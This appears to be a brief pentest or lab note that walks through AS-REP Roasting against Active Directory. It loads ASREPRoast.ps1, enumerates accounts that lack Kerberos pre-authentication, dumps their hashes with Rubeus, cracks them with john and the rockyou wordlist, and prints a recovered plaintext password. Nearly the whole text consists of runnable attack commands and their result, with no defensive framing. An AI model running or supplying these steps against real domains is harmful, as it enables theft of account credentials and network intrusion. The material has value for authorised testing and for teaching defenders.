This attack will work if the user have Don’tRequirePreAuth flag on
Loading ASREP Roast module
. .\\ASREPRoast.ps1

Enumerating all users that are vulnerable to ASREP Roasting
Invoke-ASREPRoast -Verbose

Let’s request hashes
.\\Rubeus.exe asreproast /outfile:crackme.txt

Now let’s crack the hashes using john
john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt

Amazing we got the Passwords
Qwertyuiop123